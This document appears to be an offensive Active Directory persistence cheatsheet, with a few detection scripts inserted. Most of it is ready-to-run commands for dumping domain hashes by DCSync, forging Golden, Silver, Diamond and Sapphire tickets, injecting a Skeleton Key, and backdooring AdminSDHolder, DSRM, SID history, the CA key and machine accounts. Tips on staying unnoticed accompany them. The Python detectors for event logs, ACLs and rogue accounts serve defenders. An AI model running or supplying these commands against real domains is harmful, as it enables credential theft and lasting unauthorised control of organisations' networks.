Persistence

You have Domain Admin (or equivalent). Now maintain access, extract everything of value, and establish persistence that survives password resets and remediation attempts.


DCSync

Replicate credentials from the domain controller remotely. [Requires DA or Replication Rights (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All)]

Dump all domain hashes.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc

NTLM hashes only (faster).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-ntlm

Target a specific user.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user Administrator

Extract the krbtgt hash (needed for Golden Tickets).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user krbtgt

With hash.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>@<DC_IP> -hashes :<HASH> -just-dc

Via Kerberos.

terminal.log
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>@<DC_FQDN> -k -no-pass -just-dc

Via NetExec. [Requires DA]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u <USER> -p <PASS> --ntds

With history (previous passwords, useful for password reuse analysis).

terminal.log
root@localhost:~# nxc smb <DC_IP> -u <USER> -p <PASS> --ntds --history

Tip
DCSync doesn’t require code execution on the DC. It works remotely by abusing the replication protocol. This is the cleanest way to extract all domain credentials.
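Because DCSync is an ordinary replication request, the domain controller audits it like any other replication: a Directory Service Access event (ID 4662) whose Properties field carries one of the replication control-access right GUIDs. The example below is an added defensive illustration, not part of the original cheatsheet: it walks constructed 4662 records (field names mirror the event XML) and flags replication rights exercised by any account that is not a domain controller. The DC account list is a placeholder to baseline from your own environment.

```python
"""Flag DCSync-style replication in Directory Service Access (4662) events.

Added defensive example; the 4662 records and the DC account list below are
constructed sample data, not real logs.
"""

# Real control-access right GUIDs that a DCSync request exercises.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed: machine accounts of the domain's DCs (baseline this list).
DC_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed sample 4662 events (keys mirror the event XML fields; 4662 has
# no source address, so correlate SubjectLogonId with a 4624 to get the IP).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "SubjectLogonId": "0x3e7", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "SubjectLogonId": "0x5a2f1c", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc-backup", "SubjectDomainName": "CORP",
     "SubjectLogonId": "0x7b11", "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # unrelated read
]


def replication_rights_in(properties):
    """Return the names of replication rights present in a 4662 Properties field."""
    text = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in text]


def detect_dcsync(events, dc_accounts=DC_ACCOUNTS):
    """Return one finding per 4662 event that exercises a replication right
    from an account that is not a domain controller."""
    known_dcs = {a.upper() for a in dc_accounts}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in known_dcs:
            continue  # normal DC-to-DC replication
        findings.append({
            "subject": f"{ev.get('SubjectDomainName', '')}\\{subject}",
            "logon_id": ev.get("SubjectLogonId", ""),
            "rights": rights,
            # Get-Changes-All is the right that returns password secrets.
            "secrets_exposed": "DS-Replication-Get-Changes-All" in rights,
        })
    return findings


if __name__ == "__main__":
    for f in detect_dcsync(SAMPLE_EVENTS):
        print(f"ALERT replication by {f['subject']} (logon {f['logon_id']}): "
              f"{', '.join(f['rights'])}")
```

The GUIDs must be audited in the first place: 4662 for the domain object only appears when the DC's SACL audits Control Access on it and "Audit Directory Service Access" is enabled. Accounts that legitimately replicate (Azure AD Connect with password hash sync, for example) need to be added to the allow-list rather than ignored, so that anything else stays visible.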

Golden Ticket

Forge a TGT for any user using the krbtgt hash. Valid until the krbtgt password is reset twice. [Requires krbtgt NTLM Hash + Domain SID]

Get Prerequisites

Get the domain SID.

terminal.log
root@localhost:~# impacket-lookupsid <DOMAIN>/<USER>:<PASS>@<DC_IP> 0

Get the krbtgt hash (via DCSync).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user krbtgt

Forge and Use

terminal.log
root@localhost:~# impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> Administrator
root@localhost:~# export KRB5CCNAME=Administrator.ccache
root@localhost:~# impacket-psexec <DOMAIN>/Administrator@<DC_HOSTNAME> -k -no-pass
root@localhost:~# impacket-secretsdump <DOMAIN>/Administrator@<DC_FQDN> -k -no-pass

With AES256 key (harder to detect than RC4).

terminal.log
root@localhost:~# impacket-ticketer -aesKey <KRBTGT_AES256> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> Administrator

Forge with custom group membership (e.g., Enterprise Admins for multi-domain).

terminal.log
root@localhost:~# impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> -groups 512,519,520 Administrator

From Windows (Rubeus).

terminal.log
PS C:\> .\Rubeus.exe golden /rc4:<KRBTGT_HASH> /user:Administrator /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /nowrap
PS C:\> .\Rubeus.exe ptt /ticket:<BASE64_TICKET>

Tip
Golden Tickets are valid for 10 years by default. The only remediation is resetting the krbtgt password twice (once to rotate, once to invalidate the old key). Most orgs only do it once, which still leaves the previous key valid.
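A forged TGT is never issued by the KDC, so the first trace a DC sees of it is a service-ticket request (event 4769) for a user who has no matching successful TGT request (event 4768) from that client in the preceding ticket lifetime. The example below is an added defensive illustration, not part of the original page: it correlates constructed 4768/4769 records (field names mirror the event XML) and reports orphaned service-ticket requests. The Diamond and Sapphire sections further down explain why this check alone is not sufficient.

```python
"""Correlate 4769 (TGS-REQ) with 4768 (AS-REQ) to find service tickets that
no KDC-issued TGT accounts for.

Added defensive example; the events below are constructed sample data.
Caveats: logs from every DC in the domain are needed, and a TGT renewed via
TGS-REQ can push the original 4768 out of the window, so hits are leads.
"""
from datetime import datetime, timedelta

MAX_TGT_LIFETIME = timedelta(hours=10)  # default "Maximum lifetime for user ticket"


def _principal(name):
    """Normalise 'Administrator@CORP.LOCAL' and 'administrator' to one key."""
    return name.split("@", 1)[0].lower()


def find_tgs_without_as(events, max_tgt_lifetime=MAX_TGT_LIFETIME):
    """Return 4769 requests with no successful 4768 for the same user and
    client address within the preceding TGT lifetime."""
    tgts = [e for e in events if e["EventID"] == 4768 and e.get("Status") == "0x0"]
    findings = []
    for e in sorted(events, key=lambda x: x["Time"]):
        if e["EventID"] != 4769 or e.get("Status") != "0x0":
            continue
        user, client, when = _principal(e["TargetUserName"]), e["IpAddress"], e["Time"]
        backed_by_tgt = any(
            _principal(t["TargetUserName"]) == user and t["IpAddress"] == client
            and when - max_tgt_lifetime <= t["Time"] <= when
            for t in tgts)
        if not backed_by_tgt:
            findings.append({"user": user, "client": client,
                             "service": e["ServiceName"], "time": when})
    return findings


def _t(hour, minute):
    return datetime(2024, 3, 4, hour, minute)


# Constructed sample events. IpAddress uses the IPv4-mapped form the DC logs.
SAMPLE_EVENTS = [
    {"EventID": 4768, "Time": _t(8, 0), "TargetUserName": "alice",
     "IpAddress": "::ffff:10.0.5.20", "Status": "0x0"},
    {"EventID": 4769, "Time": _t(8, 5), "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "FS01$", "IpAddress": "::ffff:10.0.5.20", "Status": "0x0"},
    # bob failed pre-authentication (0x18) and never obtained a TGT ...
    {"EventID": 4768, "Time": _t(9, 0), "TargetUserName": "bob",
     "IpAddress": "::ffff:10.0.5.31", "Status": "0x18"},
    # ... yet a service ticket is issued to him a minute later.
    {"EventID": 4769, "Time": _t(9, 1), "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "FS01$", "IpAddress": "::ffff:10.0.5.31", "Status": "0x0"},
    # No 4768 at all for Administrator from this client today.
    {"EventID": 4769, "Time": _t(11, 0), "TargetUserName": "Administrator@CORP.LOCAL",
     "ServiceName": "DC01$", "IpAddress": "::ffff:10.0.5.77", "Status": "0x0"},
]

if __name__ == "__main__":
    for f in find_tgs_without_as(SAMPLE_EVENTS):
        print(f"{f['time']:%H:%M} {f['user']} -> {f['service']} from {f['client']}: "
              "service ticket with no KDC-issued TGT")
```

Kerberos logging must be on ("Audit Kerberos Authentication Service" and "Audit Kerberos Service Ticket Operations"), and the window should be widened to the renewal lifetime (7 days by default) if renewals are common, at the cost of more noise. The krbtgt double reset the tip describes is still the only way to invalidate a ticket already forged; this check only tells you it was used.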

Silver Ticket

Forge a TGS for a specific service using that service account’s hash. Doesn’t touch the DC for validation (no AS-REQ or TGS-REQ). [Requires service account NTLM hash + Domain SID]

CIFS (file share access).

terminal.log
root@localhost:~# impacket-ticketer -nthash <SERVICE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> -spn cifs/<TARGET_FQDN> Administrator
root@localhost:~# export KRB5CCNAME=Administrator.ccache
root@localhost:~# impacket-smbclient <DOMAIN>/Administrator@<TARGET_FQDN> -k -no-pass

HTTP (web services, WinRM).

terminal.log
root@localhost:~# impacket-ticketer -nthash <SERVICE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> -spn http/<TARGET_FQDN> Administrator

LDAP (DCSync via Silver Ticket).

terminal.log
root@localhost:~# impacket-ticketer -nthash <DC_MACHINE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> -spn ldap/<DC_FQDN> Administrator
root@localhost:~# export KRB5CCNAME=Administrator.ccache
root@localhost:~# impacket-secretsdump <DOMAIN>/Administrator@<DC_FQDN> -k -no-pass -just-dc

Tip
Silver Tickets never hit the DC for validation, so they’re invisible to DC-level Kerberos logging. The tradeoff is they only work for the specific service you target.

Diamond Ticket

Modify a legitimate TGT by decrypting it with the krbtgt key and altering the PAC. Harder to detect than Golden Tickets because the ticket started as a real, legitimately issued TGT. [Requires krbtgt AES256 Key]

From Windows (Rubeus).

terminal.log
PS C:\> .\Rubeus.exe diamond /krbkey:<KRBTGT_AES256> /user:<USER> /password:<PASS> /enctype:aes /ticketuser:Administrator /domain:<DOMAIN_FQDN> /dc:<DC_FQDN> /ticketuserid:500 /groups:512 /nowrap

Tip
Diamond Tickets are the stealthiest forged ticket variant. They pass detection checks that catch Golden Tickets (like TGT requests without a corresponding AS-REQ) because the base ticket is legitimate.

Sapphire Ticket

Similar to Diamond Ticket, but uses S4U2Self + U2U to obtain a legitimate PAC for the target user, then inserts it into the forged ticket. Even stealthier because the PAC is real, not fabricated. [Requires krbtgt AES256 Key]

From Windows (Rubeus).

terminal.log
PS C:\> .\Rubeus.exe diamond /krbkey:<KRBTGT_AES256> /user:<USER> /password:<PASS> /enctype:aes /ticketuser:Administrator /domain:<DOMAIN_FQDN> /dc:<DC_FQDN> /ticketuserid:500 /groups:512 /tgtdeleg /nowrap

Tip
The /tgtdeleg flag is what makes it a Sapphire Ticket instead of Diamond. It fetches a real PAC for the target user via S4U.

Skeleton Key

Inject a skeleton key into LSASS on the DC. Allows authentication as any user with a master password while real passwords continue to work. [Requires DA + Code Execution on DC]

From Windows (Mimikatz on DC).

terminal.log
PS C:\> Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'

Now authenticate as any user with the password “mimikatz”.

terminal.log
root@localhost:~# nxc smb <DC_IP> -u Administrator -p 'mimikatz'
root@localhost:~# nxc smb <DC_IP> -u <ANY_USER> -p 'mimikatz'
root@localhost:~# evil-winrm -i <DC_IP> -u Administrator -p 'mimikatz'

Tip
Skeleton Key doesn’t survive reboots. It only lives in LSASS memory. If the DC restarts, you need to re-inject. Also, it only works on the DC you inject into (not all DCs in the domain).

AdminSDHolder Abuse

Write a backdoor ACE into AdminSDHolder. SDProp (runs every 60 minutes) will propagate it to all protected groups (Domain Admins, Enterprise Admins, Schema Admins, etc.). [Requires DA]

terminal.log
root@localhost:~# bloodyAD -u <USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> add genericAll 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' <BACKDOOR_USER>

Tip
After 60 minutes, <BACKDOOR_USER> will automatically have GenericAll on every protected group and their members. Even if someone removes your DA access, the AdminSDHolder ACE restores it on the next SDProp cycle.

Verify propagation (check if your user has rights on Domain Admins).

terminal.log
root@localhost:~# bloodyAD -u <BACKDOOR_USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> get object 'CN=Domain Admins,CN=Users,DC=domain,DC=local' --attr nTSecurityDescriptor

DSRM Abuse

The DSRM (Directory Services Restore Mode) account is a local administrator on every DC. Its password is set during DC promotion and rarely changed. [Requires DA + Registry Access on DC]

Enable network logon for the DSRM account.

terminal.log
PS C:\> New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Or via NetExec.

terminal.log
root@localhost:~# nxc smb <DC_IP> -u <USER> -p <PASS> -x 'reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f'

Dump the DSRM hash (it’s the local Administrator hash on the DC).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP>

Note: The DSRM hash appears in the SAM section of secretsdump output (not the NTDS section).

PTH with the DSRM hash.

terminal.log
root@localhost:~# impacket-psexec Administrator@<DC_IP> -hashes :<DSRM_HASH>

Tip
The DSRM password is independent of the domain. Even if all domain passwords are reset, the DSRM hash stays the same unless someone explicitly changes it.

SID History Injection

Inject a privileged SID (like Enterprise Admins) into a user’s SID History. The user inherits all privileges of that SID. [Requires DA]

From Windows (Mimikatz).

terminal.log
PS C:\> Invoke-Mimikatz -Command '"sid::patch" "sid::add /sam:<BACKDOOR_USER> /new:<ENTERPRISE_ADMIN_SID>"'

Tip
SID History persists across password resets. The injected SID stays in the user’s token until explicitly removed. Useful for cross-domain escalation when combined with trust abuse.
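Legitimate sIDHistory values only arrive through a domain migration, which gives a defender two cheap checks: an entry whose domain part is the current domain's own SID cannot have come from a migration, and an entry ending in a well-known privileged RID deserves a look regardless of origin. The example below is an added defensive illustration, not part of the original page; the account records and domain SIDs are constructed placeholders.

```python
"""Audit sIDHistory on accounts for injection indicators.

Added defensive example; accounts and domain SIDs below are constructed.
"""

CURRENT_DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"      # placeholder
MIGRATED_DOMAIN_SIDS = {"S-1-5-21-4444444444-5555555555-6666666666"}   # placeholder: retired source domain

# Well-known RIDs that confer administrative power in any domain.
PRIVILEGED_RIDS = {
    500: "Administrator", 512: "Domain Admins", 516: "Domain Controllers",
    518: "Schema Admins", 519: "Enterprise Admins",
}


def split_sid(sid):
    """Return (domain_part, rid) for an S-1-5-21-... account SID."""
    domain, _, rid = sid.rpartition("-")
    if not domain.startswith("S-1-5-21-") or not rid.isdigit():
        raise ValueError(f"not a domain account SID: {sid}")
    return domain, int(rid)


def audit_sid_history(accounts, current_domain_sid=CURRENT_DOMAIN_SID,
                      migrated_domain_sids=MIGRATED_DOMAIN_SIDS):
    """Return one finding per suspicious sIDHistory entry."""
    findings = []
    for acct in accounts:
        for sid in acct.get("sIDHistory", []):
            domain, rid = split_sid(sid)
            reasons = []
            if domain == current_domain_sid:
                reasons.append("history SID belongs to the current domain (not a migration)")
            elif domain not in migrated_domain_sids:
                reasons.append("history SID comes from an unknown source domain")
            if rid in PRIVILEGED_RIDS:
                reasons.append(f"well-known privileged RID {rid} ({PRIVILEGED_RIDS[rid]})")
            if reasons:
                findings.append({"account": acct["sAMAccountName"], "sid": sid,
                                 "reasons": reasons})
    return findings


# Constructed sample accounts.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "mmigrated",            # ordinary user carried over from the old domain
     "sIDHistory": ["S-1-5-21-4444444444-5555555555-6666666666-1203"]},
    {"sAMAccountName": "svc-print",            # Enterprise Admins SID of this very domain
     "sIDHistory": ["S-1-5-21-1111111111-2222222222-3333333333-519"]},
    {"sAMAccountName": "jdoe", "sIDHistory": []},
    {"sAMAccountName": "tmp-admin",            # Domain Admins RID from a domain nobody migrated from
     "sIDHistory": ["S-1-5-21-7777777777-8888888888-9999999999-512"]},
]

if __name__ == "__main__":
    for f in audit_sid_history(SAMPLE_ACCOUNTS):
        print(f"{f['account']}: {f['sid']} -> {'; '.join(f['reasons'])}")
```

Run it over an LDAP export of all users and computers (sIDHistory is a multi-valued attribute), and pair it with alerting on events 4765 ("SID History was added to an account") and 4766 (a failed attempt), since a value that is removed again before the next export leaves only the event trail.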

DCShadow

Register a rogue DC and push malicious changes via replication. Extremely stealthy (changes appear to come from a legitimate DC). [Requires DA + SYSTEM on a DC]

From Windows (Mimikatz, requires two terminals).

terminal.log
# Terminal 1 (running as SYSTEM): register the rogue DC and stage the change
mimikatz # lsadump::dcshadow /object:<TARGET_USER> /attribute:primaryGroupID /value:512

# Terminal 2 (running as DA): force replication
mimikatz # lsadump::dcshadow /push

Tip
DCShadow is the stealthiest persistence method. Changes bypass most SIEM detections because they look like legitimate AD replication. However, it requires SYSTEM-level access on a domain-joined machine.

AD CS Persistence

Stolen CA Private Key

If you extract the CA’s private key, you can forge any certificate indefinitely. Survives all password resets. [Requires DA + CA Access]

Backup the CA.

terminal.log
root@localhost:~# certipy ca -u Administrator@<DOMAIN_FQDN> -p <PASS> -dc-ip <DC_IP> -ca <CA_NAME> -backup

Forge a certificate for any user.

terminal.log
root@localhost:~# certipy forge -ca-pfx <CA_PFX> -upn Administrator@<DOMAIN_FQDN> -subject 'CN=Administrator,CN=Users,DC=domain,DC=local'

Authenticate with the forged cert.

terminal.log
root@localhost:~# certipy auth -pfx forged.pfx -dc-ip <DC_IP>

Tip
This is the most durable persistence method. The only remediation is revoking the CA’s certificate and rebuilding the entire PKI. Most orgs will never do this.

Rogue Certificate Template

Create or modify a certificate template with ESC1 conditions for future access. [Requires DA]

terminal.log
# Modify an existing template to allow SAN
root@localhost:~# certipy template -u Administrator@<DOMAIN_FQDN> -p <PASS> -dc-ip <DC_IP> -template <TEMPLATE_NAME> -save-old

Tip
Name the template something innocuous and restrict enrollment to a specific group you control. Less likely to be noticed during audits.

Trust Abuse

Parent-Child Trust (SID History via Golden Ticket)

Escalate from child domain to parent domain using a Golden Ticket with an extra SID for Enterprise Admins. [Requires Child Domain krbtgt Hash]

Get the parent domain SID.

terminal.log
root@localhost:~# impacket-lookupsid <PARENT_DOMAIN>/<USER>:<PASS>@<PARENT_DC_IP> 0

Forge Golden Ticket with Enterprise Admins SID from the parent domain.

terminal.log
root@localhost:~# impacket-ticketer -nthash <CHILD_KRBTGT_HASH> -domain-sid <CHILD_DOMAIN_SID> -domain <CHILD_DOMAIN_FQDN> -extra-sid <PARENT_DOMAIN_SID>-519 Administrator
root@localhost:~# export KRB5CCNAME=Administrator.ccache
root@localhost:~# impacket-psexec <PARENT_DOMAIN>/Administrator@<PARENT_DC_HOSTNAME> -k -no-pass

With AES256.

terminal.log
root@localhost:~# impacket-ticketer -aesKey <CHILD_KRBTGT_AES256> -domain-sid <CHILD_DOMAIN_SID> -domain <CHILD_DOMAIN_FQDN> -extra-sid <PARENT_DOMAIN_SID>-519 Administrator

Tip
SID filtering is supposed to prevent this across forest trusts, but it doesn’t apply to parent-child trusts within the same forest. Compromising any child domain in a forest = compromising the entire forest.

Cross-Forest Trust Abuse

This applies when SID filtering is disabled or misconfigured on a forest trust, or when selective authentication is not enforced.

terminal.log
# Enumerate the foreign forest
root@localhost:~# bloodhound-python -c all -u <USER>@<CHILD_DOMAIN_FQDN> -p <PASS> -d <FOREIGN_DOMAIN_FQDN> -ns <FOREIGN_DC_IP> --zip

Check for foreign group memberships (users from your domain in groups of the foreign domain).

terminal.log
root@localhost:~# ldeep ldap -u <USER> -p <PASS> -d <FOREIGN_DOMAIN_FQDN> -s ldap://<FOREIGN_DC_IP> membersof 'Domain Admins'

Grant DCSync Rights (Backdoor)

Grant a controlled user DCSync rights for persistent credential access. [Requires DA]

terminal.log
root@localhost:~# bloodyAD -u <USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> add dcsync <BACKDOOR_USER>

Verify.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<BACKDOOR_USER>:<PASS>@<DC_IP> -just-dc-user krbtgt

Tip
Granting DCSync rights is subtler than adding to Domain Admins. The user doesn’t need to be in any privileged group. They just need two replication ACEs on the domain object.
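Both the AdminSDHolder backdoor above and the DCSync-rights backdoor here leave the same kind of trace: an ACE on a single object that grants a non-default trustee a right it should not have. The example below is an added defensive illustration, not part of the original page: a small SDDL DACL parser plus two audits, one for full-control ACEs on AdminSDHolder and one for the two replication control-access rights on the domain object. The SDDL strings and SIDs are constructed samples, and the trustee allow-lists are assumptions to baseline against a known-good domain before use.

```python
"""Audit DACLs (SDDL form) for AdminSDHolder take-over ACEs and for
replication rights on the domain head.

Added defensive example; SDDL strings, SIDs and allow-lists are constructed
placeholders. Simplified parser: conditional ACEs and resource attributes are
not handled.
"""
import re

ACE_RE = re.compile(r"\(([^)]*)\)")
DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))*)")

# Real control-access right GUIDs behind DCSync.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
# Rights that let a trustee take an object over outright.
TAKEOVER_RIGHTS = {"GA", "WD", "WO", "WP"}


def parse_dacl(sddl):
    """Return the DACL ACEs of an SDDL string as dicts."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(1)):
        fields = body.split(";")
        if len(fields) < 6:
            continue
        ace_type, flags, rights, obj_guid, _inherit_guid, trustee = fields[:6]
        # Rights are either a hex mask or a run of two-letter tokens.
        right_set = {rights} if rights.startswith("0x") else \
            {rights[i:i + 2] for i in range(0, len(rights), 2)}
        aces.append({"type": ace_type, "flags": flags, "rights": right_set,
                     "object_guid": obj_guid.lower(), "trustee": trustee})
    return aces


def audit_adminsdholder(sddl, expected_trustees):
    """Allow ACEs granting take-over rights on AdminSDHolder to anyone outside
    the expected set; SDProp copies these onto every protected group."""
    return [a for a in parse_dacl(sddl)
            if a["type"] in ("A", "OA") and a["rights"] & TAKEOVER_RIGHTS
            and a["trustee"] not in expected_trustees]


def audit_replication_rights(sddl, allowed_trustees):
    """Object ACEs on the domain head granting a replication control right to
    anyone outside the allowed set (the DCSync prerequisites)."""
    return [a for a in parse_dacl(sddl)
            if a["type"] == "OA" and "CR" in a["rights"]
            and a["object_guid"] in REPLICATION_GUIDS
            and a["trustee"] not in allowed_trustees]


# Constructed placeholders.
SID_BACKDOOR = "S-1-5-21-1111111111-2222222222-3333333333-1105"
SID_SVC = "S-1-5-21-1111111111-2222222222-3333333333-1106"
EXPECTED_ADMINSDHOLDER_TRUSTEES = {"SY", "DA", "EA", "BA", "AO"}  # assumption: baseline first
ALLOWED_REPLICATION_TRUSTEES = {"SY", "ED", "DA", "EA", "BA"}    # assumption: baseline first

ADMINSDHOLDER_SDDL = ("O:DAG:DAD:PAI(A;;GA;;;SY)(A;;GA;;;DA)(A;;GA;;;EA)(A;;RPLCLORC;;;AU)"
                      f"(A;;GA;;;{SID_BACKDOOR})")
DOMAIN_SDDL = ("O:DAG:DAD:AI"
               "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
               "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
               "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;DA)"
               f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{SID_SVC})"
               f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{SID_SVC})"
               "(A;;RPLCLORC;;;AU)")

if __name__ == "__main__":
    for a in audit_adminsdholder(ADMINSDHOLDER_SDDL, EXPECTED_ADMINSDHOLDER_TRUSTEES):
        print("AdminSDHolder take-over ACE for", a["trustee"], sorted(a["rights"]))
    for a in audit_replication_rights(DOMAIN_SDDL, ALLOWED_REPLICATION_TRUSTEES):
        print("replication right", a["object_guid"], "granted to", a["trustee"])
```

Feed it the nTSecurityDescriptor of AdminSDHolder and of the domain head in SDDL form (for example from `(Get-Acl "AD:\CN=AdminSDHolder,CN=System,DC=domain,DC=local").Sddl`). The ACE that propagated to Domain Admins is a symptom; the AdminSDHolder entry is the root, and only removing it stops SDProp from restoring the access on the next cycle.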

Machine Account Persistence

Create a machine account and add it to a privileged group. Machine accounts don’t expire and are rarely audited. [Requires DA]

terminal.log
# Create machine account
root@localhost:~# impacket-addcomputer <DOMAIN>/<USER>:<PASS> -computer-name YOURPC01$ -computer-pass 'StrongPass123!' -dc-ip <DC_IP>

# Add to Domain Admins (or another privileged group)
root@localhost:~# bloodyAD -u <USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> add groupMember 'Domain Admins' 'YOURPC01$'

Use it.

terminal.log
root@localhost:~# impacket-psexec <DOMAIN>/YOURPC01$:'StrongPass123!'@<DC_FQDN>
root@localhost:~# impacket-secretsdump /YOURPC01$:'StrongPass123!'@<DC_IP> -just-dc

Tip
Machine accounts blend into the noise. There are usually hundreds of them in any domain. Name yours something that looks like a legitimate workstation.
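A machine account that was created with a tool rather than joined by a real host looks different from the hundreds of genuine ones: it has no operatingSystem value (the joining host writes that), it often carries mS-DS-CreatorSID (set when a non-admin creates the object through the MachineAccountQuota), and no workstation has a reason to be in an administrative group. The example below is an added defensive illustration, not part of the original page: it scores constructed computer records and group memberships against those three signals. The "no operatingSystem" test is a heuristic and is only reported together with another signal.

```python
"""Audit computer accounts for backdoor indicators.

Added defensive example; computer records and group memberships below are
constructed sample data.
"""

# Groups no workstation or member server has a reason to be in.
PRIVILEGED_GROUPS = {
    "Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators",
    "Account Operators", "Backup Operators", "Server Operators",
}


def audit_machine_accounts(computers, group_members, dc_accounts):
    """Return findings for computer accounts that look like persistence
    rather than real hosts."""
    findings = []
    for comp in computers:
        name = comp["sAMAccountName"]
        reasons = []
        privileged = sorted(g for g, members in group_members.items()
                            if g in PRIVILEGED_GROUPS and name in members)
        if privileged:
            reasons.append("member of privileged group(s): " + ", ".join(privileged))
        creator = comp.get("mS-DS-CreatorSID")
        if creator:
            reasons.append(f"created through MachineAccountQuota by {creator}")
        if not comp.get("operatingSystem") and name not in dc_accounts:
            reasons.append("no operatingSystem value: never joined by a real host")
        # Any privileged membership is reported; otherwise require two signals,
        # since a lone quota-created workstation is routine in many domains.
        if privileged or len(reasons) >= 2:
            findings.append({"account": name, "reasons": reasons})
    return findings


# Constructed sample data; the creator SID is a placeholder.
DC_ACCOUNTS = {"DC01$"}
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC01$", "operatingSystem": "Windows Server 2022 Datacenter"},
    {"sAMAccountName": "WS-FIN-042$", "operatingSystem": "Windows 11 Enterprise"},
    {"sAMAccountName": "DEV-LAB-07$", "operatingSystem": "Windows 11 Enterprise",
     "mS-DS-CreatorSID": "S-1-5-21-1111111111-2222222222-3333333333-1342"},
    {"sAMAccountName": "YOURPC01$",
     "mS-DS-CreatorSID": "S-1-5-21-1111111111-2222222222-3333333333-1105"},
    {"sAMAccountName": "BLD-AGENT-03$",
     "mS-DS-CreatorSID": "S-1-5-21-1111111111-2222222222-3333333333-1105"},
]
SAMPLE_GROUP_MEMBERS = {
    "Domain Admins": {"Administrator", "da-jsmith", "YOURPC01$"},
    "Domain Controllers": {"DC01$"},
    "Domain Computers": {"WS-FIN-042$", "DEV-LAB-07$", "YOURPC01$", "BLD-AGENT-03$"},
}

if __name__ == "__main__":
    for f in audit_machine_accounts(SAMPLE_COMPUTERS, SAMPLE_GROUP_MEMBERS, DC_ACCOUNTS):
        print(f"{f['account']}: " + "; ".join(f["reasons"]))
```

Event 4741 ("A computer account was created") gives the same creator information in real time, and setting ms-DS-MachineAccountQuota to 0 removes the unprivileged creation path entirely; an account created by a Domain Admin will not carry mS-DS-CreatorSID, which is why the group-membership check stays in.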

Persistence Durability Reference

| Technique      | Survives Password Reset | Survives krbtgt Reset (x2) | Survives DC Reboot | Detection Difficulty |
| -------------- | ----------------------- | -------------------------- | ------------------ | -------------------- |
| Golden Ticket  | Yes                     | No                         | Yes                | Medium               |
| Silver Ticket  | Yes                     | Yes                        | Yes                | Low                  |
| Diamond Ticket | Yes                     | No                         | Yes                | High                 |
